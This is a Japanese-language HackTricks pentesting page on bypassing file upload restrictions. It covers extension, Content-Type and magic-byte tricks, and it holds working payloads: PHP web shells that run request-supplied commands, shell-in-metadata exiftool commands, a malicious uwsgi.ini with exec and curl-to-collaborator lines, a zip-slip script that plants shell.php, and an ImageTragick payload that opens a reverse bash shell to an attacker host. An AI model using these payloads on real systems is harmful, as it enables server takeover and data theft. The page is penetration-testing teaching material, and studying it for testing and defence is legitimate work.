hacktricks/pentesting-web/file-upload
2024-11-19 12:04:39 +00:00
..
pdf-upload-xxe-and-cors-bypass.md Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie 2024-07-19 04:03:05 +00:00
README.md Translated ['README.md', 'binary-exploitation/format-strings/README.md', 2024-11-19 12:04:39 +00:00

ファイルアップロード

{% hint style="success" %} AWSハッキングを学び、実践するHackTricks Training AWS Red Team Expert (ARTE)
GCPハッキングを学び、実践するHackTricks Training GCP Red Team Expert (GRTE)

HackTricksをサポートする
{% endhint %}

ハッキングキャリアに興味があり、ハッキング不可能なものをハッキングしたい方 - 私たちは採用しています! (流暢なポーランド語の読み書きが必要です)。

{% embed url="https://www.stmcyber.com/careers" %}

ファイルアップロード一般的手法

他の有用な拡張子:

  • PHP: .php, .php2, .php3, .php4, .php5, .php6, .php7, .phps, .phps, .pht, .phtm, .phtml, .pgif, .shtml, .htaccess, .phar, .inc, .hphp, .ctp, .module
  • PHPv8での動作: .php, .php4, .php5, .phtml, .module, .inc, .hphp, .ctp
  • ASP: .asp, .aspx, .config, .ashx, .asmx, .aspq, .axd, .cshtm, .cshtml, .rem, .soap, .vbhtm, .vbhtml, .asa, .cer, .shtml
  • Jsp: .jsp, .jspx, .jsw, .jsv, .jspf, .wss, .do, .action
  • Coldfusion: .cfm, .cfml, .cfc, .dbm
  • Flash: .swf
  • Perl: .pl, .cgi
  • Erlang Yaws Web Server: .yaws

ファイル拡張子チェックのバイパス

  1. 適用される場合、前の拡張子をチェックします。また、いくつかの大文字を使用してテストします:pHp, .pHP5, .PhAr ...
  2. 実行拡張子の前に有効な拡張子を追加してチェックします(前の拡張子も使用):
  • file.png.php
  • file.png.Php5
  1. 特殊文字を末尾に追加してみてください。Burpを使用してすべてのasciiおよびUnicode文字をブルートフォースすることができます。 (前述の拡張子も試すことができます)
  • file.php%20
  • file.php%0a
  • file.php%00
  • file.php%0d%0a
  • file.php/
  • file.php.\
  • file.
  • file.php....
  • file.pHp5....
  1. サーバー側の拡張子パーサーをだまして保護をバイパスしてみてください。拡張子を二重にするか、ジャンクデータ(nullバイト)を拡張子の間に追加します。 前の拡張子を使用して、より良いペイロードを準備することもできます。
  • file.png.php
  • file.png.pHp5
  • file.php#.png
  • file.php%00.png
  • file.php\x00.png
  • file.php%0a.png
  • file.php%0d%0a.png
  • file.phpJunk123png
  1. 前のチェックに別の拡張子の層を追加します:
  • file.png.jpg.php
  • file.php%00.png%00.jpg
  1. 有効な拡張子の前にexec拡張子を置き、サーバーが誤って構成されていることを祈ります。(拡張子**.phpで終わらないが、.php**で終わるものはすべてコードを実行するApacheの誤設定を悪用するのに便利です
  • file.php.png
  1. WindowsでのNTFS代替データストリームADSを使用します。この場合、禁止された拡張子の後にコロン文字「:」が挿入され、許可された拡張子の前に挿入されます。その結果、サーバー上に禁止された拡張子を持つ空のファイルが作成されます「file.asax:.jpg」。このファイルは、他の技術を使用して後で編集することができます。**“::$data”**パターンを使用して非空のファイルを作成することもできます。したがって、このパターンの後にドット文字を追加することも、さらなる制限をバイパスするのに役立ちます「file.asp::$data.”」)
  2. ファイル名の制限を破ることを試みます。有効な拡張子が切り捨てられ、悪意のあるPHPが残ります。AAA<--SNIP-->AAA.php
# Linuxの最大255バイト
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 255
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4 # ここで4を引き、.pngを追加
# ファイルをアップロードし、どれだけの文字を許可するか応答を確認します。236としましょう
python -c 'print "A" * 232'
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
# ペイロードを作成
AAA<--SNIP 232 A-->AAA.php.png

Content-Type、マジックナンバー、圧縮リサイズのバイパス

  • Content-Typeチェックをバイパスするには、Content-Type ヘッダーを次のように設定します:image/png , text/plain , application/octet-stream
  1. Content-Type ワードリストhttps://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/Web/content-type.txt
  • マジックナンバーチェックをバイパスするには、ファイルの先頭に実際の画像のバイトを追加します_file_コマンドを混乱させます。または、メタデータ内にシェルを挿入します:
    exiftool -Comment="<?php echo 'Command:'; if($_POST){system($_POST['cmd']);} __halt_compiler();" img.jpg
    \ または、画像内にペイロードを直接挿入することもできます:
    echo '<?php system($_REQUEST['cmd']); ?>' >> img.png
  • 画像に圧縮が追加されている場合、たとえば、PHP-GDのような標準のPHPライブラリを使用している場合、前述の技術は役に立ちません。しかし、PLTEチャンクここで定義された技術を使用して、圧縮に耐えるテキストを挿入できます。
  • コードのあるGitHub
  • ウェブページが画像をリサイズしている場合、たとえば、PHP-GD関数imagecopyresizedまたはimagecopyresampledを使用している場合、前述の技術は役に立ちません。しかし、IDATチャンクここで定義された技術を使用して、圧縮に耐えるテキストを挿入できます。
  • コードのあるGitHub
  • 画像のリサイズに耐えるペイロードを作成する別の技術として、PHP-GD関数thumbnailImageを使用します。しかし、tEXtチャンクここで定義された技術を使用して、圧縮に耐えるテキストを挿入できます。
  • コードのあるGitHub

その他のチェックすべきトリック

  • すでにアップロードされたファイルの名前を変更する脆弱性を見つけます(拡張子を変更するため)。
  • ローカルファイルインクルージョンの脆弱性を見つけてバックドアを実行します。
  • 情報漏洩の可能性
  1. 同じ名前同じファイル複数回(および同時に)アップロードします。
  2. 既存のファイルまたはフォルダ名前でファイルをアップロードします。
  3. “.”、 “..”、または “…”を名前に持つファイルをアップロードします。たとえば、ApacheのWindowsでは、アプリケーションがアップロードされたファイルを「/www/uploads/」ディレクトリに保存する場合、「.」というファイル名は「/www/」ディレクトリに「uploads」というファイルを作成します。
  4. NTFSで簡単に削除できないファイルをアップロードします(例:“…:.jpg”)。(Windows)
  5. 無効な文字(例:|<>*?”)を名前に持つファイルをWindowsにアップロードします。(Windows)
  6. 予約された禁止された名前CON、PRN、AUX、NUL、COM1、COM2、COM3、COM4、COM5、COM6、COM7、COM8、COM9、LPT1、LPT2、LPT3、LPT4、LPT5、LPT6、LPT7、LPT8、LPT9を使用してファイルをWindowsにアップロードします。
  • 実行可能ファイル.exeまたは**.html**(あまり疑わしくない)をアップロードして、被害者が誤って開いたときにコードを実行させることも試みてください。

特殊な拡張子のトリック

PHPサーバーにファイルをアップロードしようとしている場合、コードを実行するための**.htaccess**トリックを確認してください
ASPサーバーにファイルをアップロードしようとしている場合、コードを実行するための**.config**トリックを確認してください

.pharファイルはJavaの.jarのようなもので、PHP用であり、PHPファイルのように使用できますPHPで実行したり、スクリプト内に含めたりすることができます...)。

.inc拡張子は、ファイルをインポートするためだけに使用されるPHPファイルに時々使用されるため、ある時点で誰かがこの拡張子を実行可能にした可能性があります。

Jetty RCE

JettyサーバーにXMLファイルをアップロードできる場合、新しい*.xmlおよび*.warが自動的に処理されるためRCEを取得できます 次の画像で述べたように、XMLファイルを$JETTY_BASE/webapps/にアップロードし、シェルを期待してください!

https://twitter.com/ptswarm/status/1555184661751648256/photo/1

uWSGI RCE

この脆弱性の詳細な調査については、元の研究を確認してください:uWSGI RCEの悪用

リモートコマンド実行RCE脆弱性は、.ini構成ファイルを変更する能力がある場合、uWSGIサーバーで悪用できます。uWSGI構成ファイルは、"magic"変数、プレースホルダー、および演算子を組み込むために特定の構文を利用します。特に、@(filename)として使用される'@'演算子は、ファイルの内容を含めるために設計されています。uWSGIでサポートされているさまざまなスキームの中で、"exec"スキームは特に強力で、プロセスの標準出力からデータを読み取ることを可能にします。この機能は、.ini構成ファイルが処理されるときに、リモートコマンド実行や任意のファイルの書き込み/読み取りなどの悪用に利用できます。

以下は、さまざまなスキームを示す有害なuwsgi.iniファイルの例です:

[uwsgi]
; read from a symbol
foo = @(sym://uwsgi_funny_function)
; read from binary appended data
bar = @(data://[REDACTED])
; read from http
test = @(http://[REDACTED])
; read from a file descriptor
content = @(fd://[REDACTED])
; read from a process stdout
body = @(exec://whoami)
; curl to exfil via collaborator
extra = @(exec://curl http://collaborator-unique-host.oastify.com)
; call a function returning a char *
characters = @(call://uwsgi_func)

ペイロードの実行は、設定ファイルの解析中に発生します。設定が有効化され、解析されるためには、uWSGIプロセスを再起動する必要がありますクラッシュ後やサービス拒否攻撃のためにまたはファイルを自動再読み込みに設定する必要があります。自動再読み込み機能が有効になっている場合、変更を検出すると指定された間隔でファイルが再読み込みされます。

uWSGIの設定ファイル解析の緩い性質を理解することが重要です。具体的には、議論されたペイロードはバイナリファイル画像やPDFなどに挿入でき、潜在的な悪用の範囲をさらに広げます。

wget File Upload/SSRF Trick

場合によっては、サーバーが**wgetを使用してファイルをダウンロードしており、URL指定できることがあります。この場合、コードはダウンロードされたファイルの拡張子がホワイトリスト内にあるかどうかを確認して、許可されたファイルのみがダウンロードされることを保証しているかもしれません。しかし、このチェックは回避可能です。
linuxにおける
ファイル名最大長は255ですが、wgetはファイル名を236文字に切り詰めます。"A"*232+".php"+".gif"という名前のファイルをダウンロードできます。このファイル名はチェックを回避します(この例では".gif"有効な拡張子です)が、wgetはファイル名を"A"*232+".php"変更**します。

#Create file and HTTP server
echo "SOMETHING" > $(python -c 'print("A"*(236-4)+".php"+".gif")')
python3 -m http.server 9080
#Download the file
wget 127.0.0.1:9080/$(python -c 'print("A"*(236-4)+".php"+".gif")')
The name is too long, 240 chars total.
Trying to shorten...
New name is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php.
--2020-06-13 03:14:06--  http://127.0.0.1:9080/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php.gif
Connecting to 127.0.0.1:9080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 10 [image/gif]
Saving to: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php

AAAAAAAAAAAAAAAAAAAAAAAAAAAAA 100%[===============================================>]      10  --.-KB/s    in 0s

2020-06-13 03:14:06 (1.96 MB/s) - AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php saved [10/10]

注意してください。別のオプションとして、このチェックをバイパスするために考えているかもしれないのは、HTTPサーバーが別のファイルにリダイレクトすることです。そうすれば、最初のURLはチェックをバイパスし、その後wgetが新しい名前のリダイレクトされたファイルをダウンロードします。これは、wgetが --trust-server-names パラメータを使用していない限り 機能しません。なぜなら、wgetは元のURLに示されたファイル名でリダイレクトされたページをダウンロードするからです

ツール

  • Upload Bypass は、ペンテスターやバグハンターがファイルアップロードメカニズムをテストするのを支援するために設計された強力なツールです。さまざまなバグバウンティ技術を活用して、脆弱性の特定と悪用のプロセスを簡素化し、Webアプリケーションの徹底的な評価を保証します。

ファイルアップロードから他の脆弱性へ

以下は、アップロードによって達成できることのトップ10リストですこちらから

  1. ASP / ASPX / PHP5 / PHP / PHP3: Webシェル / RCE
  2. SVG: ストレージXSS / SSRF / XXE
  3. GIF: ストレージXSS / SSRF
  4. CSV: CSVインジェクション
  5. XML: XXE
  6. AVI: LFI / SSRF
  7. HTML / JS : HTMLインジェクション / XSS / オープンリダイレクト
  8. PNG / JPEG: ピクセルフラッド攻撃 (DoS)
  9. ZIP: LFI経由のRCE / DoS
  10. PDF / PPTX: SSRF / BLIND XXE

Burp拡張

{% embed url="https://github.com/portswigger/upload-scanner" %}

マジックヘッダーバイト

  • PNG: "\x89PNG\r\n\x1a\n\0\0\0\rIHDR\0\0\x03H\0\xs0\x03["
  • JPG: "\xff\xd8\xff"

他のファイルタイプについては、https://en.wikipedia.org/wiki/List_of_file_signaturesを参照してください。

Zip/Tarファイルの自動解凍アップロード

サーバー内で解凍されるZIPをアップロードできる場合、2つのことができます

シンボリックリンク

他のファイルへのソフトリンクを含むリンクをアップロードし、解凍されたファイルにアクセスすることでリンクされたファイルにアクセスします:

ln -s ../../../index.php symindex.txt
zip --symlinks test.zip symindex.txt
tar -cvf test.tar symindex.txt

異なるフォルダに展開する

展開中にディレクトリ内にファイルが予期せず作成されることは重大な問題です。この設定が悪意のあるファイルアップロードによるOSレベルのコマンド実行から守ると最初は考えられていましたが、ZIPアーカイブ形式の階層的圧縮サポートとディレクトリトラバーサル機能が悪用される可能性があります。これにより、攻撃者は制限を回避し、ターゲットアプリケーションの展開機能を操作することで安全なアップロードディレクトリから脱出することができます。

そのようなファイルを作成するための自動化されたエクスプロイトは、evilarc on GitHubで入手可能です。このユーティリティは次のように使用できます:

# Listing available options
python2 evilarc.py -h
# Creating a malicious archive
python2 evilarc.py -o unix -d 5 -p /var/www/html/ rev.php

さらに、evilarcを使ったシンボリックリンクトリックも選択肢です。目的が/flag.txtのようなファイルをターゲットにすることであれば、そのファイルへのシンボリックリンクをシステムに作成する必要があります。これにより、evilarcが操作中にエラーに遭遇しないことが保証されます。

以下は、悪意のあるzipファイルを作成するために使用されるPythonコードの例です

#!/usr/bin/python
import zipfile
from io import BytesIO

def create_zip():
f = BytesIO()
z = zipfile.ZipFile(f, 'w', zipfile.ZIP_DEFLATED)
z.writestr('../../../../../var/www/html/webserver/shell.php', '<?php echo system($_REQUEST["cmd"]); ?>')
z.writestr('otherfile.xml', 'Content of the file')
z.close()
zip = open('poc.zip','wb')
zip.write(f.getvalue())
zip.close()

create_zip()

圧縮を悪用したファイルスプレー

詳細については、元の投稿を確認してください: https://blog.silentsignal.eu/2014/01/31/file-upload-unzip/

  1. PHPシェルの作成: PHPコードは、$_REQUEST変数を通じて渡されたコマンドを実行するように書かれています。
<?php
if(isset($_REQUEST['cmd'])){
$cmd = ($_REQUEST['cmd']);
system($cmd);
}?>
  1. ファイルスプレーと圧縮ファイルの作成: 複数のファイルが作成され、これらのファイルを含むzipアーカイブが組み立てられます。
root@s2crew:/tmp# for i in `seq 1 10`;do FILE=$FILE"xxA"; cp simple-backdoor.php $FILE"cmd.php";done
root@s2crew:/tmp# zip cmd.zip xx*.php
  1. Hexエディタまたはviによる修正: zip内のファイル名はviまたはhexエディタを使用して変更され、「xxA」を「../」に変更してディレクトリを横断します。
:set modifiable
:%s/xxA/..\//g
:x!

ImageTragic

このコンテンツを画像拡張子でアップロードして脆弱性を悪用します (ImageMagick , 7.0.1-1) (元のエクスプロイト)

push graphic-context
viewbox 0 0 640 480
fill 'url(https://127.0.0.1/test.jpg"|bash -i >& /dev/tcp/attacker-ip/attacker-port 0>&1|touch "hello)'
pop graphic-context

PNGにPHPシェルを埋め込む

PNGファイルのIDATチャンクにPHPシェルを埋め込むことで、特定の画像処理操作を効果的に回避できます。PHP-GDのimagecopyresizedおよびimagecopyresampled関数は、この文脈で特に関連性が高く、画像のリサイズやリサンプリングに一般的に使用されます。埋め込まれたPHPシェルがこれらの操作の影響を受けない能力は、特定のユースケースにおいて重要な利点です。

この技術の詳細な探求、方法論および潜在的な応用については、次の記事に記載されています: "PNG IDATチャンクにウェブシェルをエンコードする"。このリソースは、プロセスとその影響について包括的な理解を提供します。

詳細情報は: https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/

ポリグロットファイル

ポリグロットファイルはサイバーセキュリティにおけるユニークなツールであり、複数のファイル形式に同時に有効に存在できるカメレオンのような役割を果たします。興味深い例として、GIFARがあります。これはGIFとRARアーカイブの両方として機能するハイブリッドです。このようなファイルはこのペアリングに限らず、GIFとJSやPPTとJSのような組み合わせも可能です。

ポリグロットファイルの主な利点は、タイプに基づいてファイルをスクリーニングするセキュリティ対策を回避できる能力にあります。さまざまなアプリケーションでは、JPEG、GIF、DOCなどの特定のファイルタイプのみをアップロードすることが一般的であり、潜在的に有害なフォーマットJS、PHP、またはPharファイルによるリスクを軽減します。しかし、ポリグロットは複数のファイルタイプの構造基準に適合することで、これらの制限を巧妙に回避できます。

適応性があるにもかかわらず、ポリグロットには制限もあります。たとえば、ポリグロットが同時にPHARファイルPHp ARchiveとJPEGを具現化している場合でも、そのアップロードの成功はプラットフォームのファイル拡張子ポリシーに依存することがあります。システムが許可される拡張子に厳格である場合、ポリグロットの単なる構造的二重性ではアップロードを保証するには不十分な場合があります。

詳細情報は: https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a

参考文献

もしあなたがハッキングキャリアに興味があり、ハッキング不可能なものをハックしたいなら - 私たちは採用しています! (流暢なポーランド語の読み書きが必要です)。

{% embed url="https://www.stmcyber.com/careers" %}

{% hint style="success" %} AWSハッキングを学び、実践する:HackTricks Training AWS Red Team Expert (ARTE)
GCPハッキングを学び、実践する: HackTricks Training GCP Red Team Expert (GRTE)

HackTricksをサポートする
{% endhint %}